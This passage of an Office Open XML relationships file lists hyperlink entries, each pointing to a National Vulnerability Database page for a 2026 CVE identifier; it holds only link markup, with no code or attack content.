Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16005" TargetMode="External" Id="rId1825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69559" TargetMode="External" Id="rId1826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74866" TargetMode="External" Id="rId1827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75811" TargetMode="External" Id="rId1828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76925" TargetMode="External" Id="rId1829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84193" TargetMode="External" Id="rId1830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16006" TargetMode="External" Id="rId1831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18023" TargetMode="External" Id="rId1832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68874" TargetMode="External" Id="rId1833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69317" TargetMode="External" Id="rId1834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69349" TargetMode="External" Id="rId1835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69372" TargetMode="External" Id="rId1836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69393" TargetMode="External" Id="rId1837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId1838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69416" TargetMode="External" Id="rId1839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69507" TargetMode="External" Id="rId1840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69552" TargetMode="External" Id="rId1841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69569" TargetMode="External" Id="rId1842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69572" TargetMode="External" Id="rId1843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId1844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId1845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId1846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId1847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75808" TargetMode="External" Id="rId1848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75810" TargetMode="External" Id="rId1849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId1850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83557" TargetMode="External" Id="rId1851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12208" TargetMode="External" Id="rId1852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16689" TargetMode="External" Id="rId1853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18858" TargetMode="External" Id="rId1854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28584" TargetMode="External" Id="rId1855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28596" TargetMode="External" Id="rId1856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28617" TargetMode="External" Id="rId1857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28633" TargetMode="External" Id="rId1858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31911" TargetMode="External" Id="rId1859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31912" TargetMode="External" Id="rId1860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49883" TargetMode="External" Id="rId1861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54611" TargetMode="External" Id="rId1862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6244" TargetMode="External" Id="rId1863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6554" TargetMode="External" Id="rId1864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId1865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId1866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68842" TargetMode="External" Id="rId1867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68843" TargetMode="External" Id="rId1868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId1869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68852" TargetMode="External" Id="rId1870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68873" TargetMode="External" Id="rId1871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68881" TargetMode="External" Id="rId1872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68886" TargetMode="External" Id="rId1873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68895" TargetMode="External" Id="rId1874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId1875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69288" TargetMode="External" Id="rId1876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69294" TargetMode="External" Id="rId1877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69303" TargetMode="External" Id="rId1878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69308" TargetMode="External" Id="rId1879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69315" TargetMode="External" Id="rId1880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69318" TargetMode="External" Id="rId1881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69321" TargetMode="External" Id="rId1882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69339" TargetMode="External" Id="rId1883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId1884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69344" TargetMode="External" Id="rId1885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69345" TargetMode="External" Id="rId1886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69351" TargetMode="External" Id="rId1887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69353" TargetMode="External" Id="rId1888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69367" TargetMode="External" Id="rId1889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69369" TargetMode="External" Id="rId1890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69376" TargetMode="External" Id="rId1891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69390" TargetMode="External" Id="rId1892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69403" TargetMode="External" Id="rId1893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId1894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69453" TargetMode="External" Id="rId1895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId1896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId1897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId1898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69531" TargetMode="External" Id="rId1899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69554" TargetMode="External" Id="rId1900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69568" TargetMode="External" Id="rId1901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69609" TargetMode="External" Id="rId1902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId1903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69618" TargetMode="External" Id="rId1904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId1905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69672" TargetMode="External" Id="rId1906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69674" TargetMode="External" Id="rId1907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69684" TargetMode="External" Id="rId1908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69741" TargetMode="External" Id="rId1909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69770" TargetMode="External" Id="rId1910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69794" TargetMode="External" Id="rId1911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId1912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId1913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId1914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" TargetMode="External" Id="rId1915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId1916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71441" TargetMode="External" Id="rId1917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72937" TargetMode="External" Id="rId1918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72945" TargetMode="External" Id="rId1919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72964" TargetMode="External" Id="rId1920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72966" TargetMode="External" Id="rId1921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73004" TargetMode="External" Id="rId1922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId1923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77488" TargetMode="External" Id="rId1924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId1925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77492" TargetMode="External" Id="rId1926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId1927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78506" TargetMode="External" Id="rId1928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78513" TargetMode="External" Id="rId1929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79910" TargetMode="External" Id="rId1930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80160" TargetMode="External" Id="rId1931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80162" TargetMode="External" Id="rId1932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81387" TargetMode="External" Id="rId1933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81390" TargetMode="External" Id="rId1934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81391" TargetMode="External" Id="rId1935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81392" TargetMode="External" Id="rId1936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81393" TargetMode="External" Id="rId1937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81394" TargetMode="External" Id="rId1938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81395" TargetMode="External" Id="rId1939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81399" TargetMode="External" Id="rId1940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81400" TargetMode="External" Id="rId1941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81401" TargetMode="External" Id="rId1942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81958" TargetMode="External" Id="rId1943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81977" TargetMode="External" Id="rId1944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81978" TargetMode="External" Id="rId1945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81982" TargetMode="External" Id="rId1946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81984" TargetMode="External" Id="rId1947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81991" TargetMode="External" Id="rId1948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81993" TargetMode="External" Id="rId1949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82001" TargetMode="External" Id="rId1950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82193" TargetMode="External" Id="rId1951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82194" TargetMode="External" Id="rId1952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82547" TargetMode="External" Id="rId1953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId1954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83949" TargetMode="External" Id="rId1955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83951" TargetMode="External" Id="rId1956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId1957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85381" TargetMode="External" Id="rId1958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85399" TargetMode="External" Id="rId1959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85517" TargetMode="External" Id="rId1960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85522" TargetMode="External" Id="rId1961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85636" TargetMode="External" Id="rId1962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85637" TargetMode="External" Id="rId1963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85701" TargetMode="External" Id="rId1964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85702" TargetMode="External" Id="rId1965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85875" TargetMode="External" Id="rId1966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86084" TargetMode="External" Id="rId1967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86159" TargetMode="External" Id="rId1968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86160" TargetMode="External" Id="rId1969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86162" TargetMode="External" Id="rId1970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86168" TargetMode="External" Id="rId1971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86179" TargetMode="External" Id="rId1972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86180" TargetMode="External" Id="rId1973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86209" TargetMode="External" Id="rId1974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86211" TargetMode="External" Id="rId1975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86214" TargetMode="External" Id="rId1976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86220" TargetMode="External" Id="rId1977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86221" TargetMode="External" Id="rId1978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86223" TargetMode="External" Id="rId1979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86225" TargetMode="External" Id="rId1980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86511" TargetMode="External" Id="rId1981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86513" TargetMode="External" Id="rId1982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86519" TargetMode="External" Id="rId1983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86665" TargetMode="External" Id="rId1984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86666" TargetMode="External" Id="rId1985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86669" TargetMode="External" Id="rId1986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86672" TargetMode="External" Id="rId1987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId1988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86716" TargetMode="External" Id="rId1989" /><Relationship 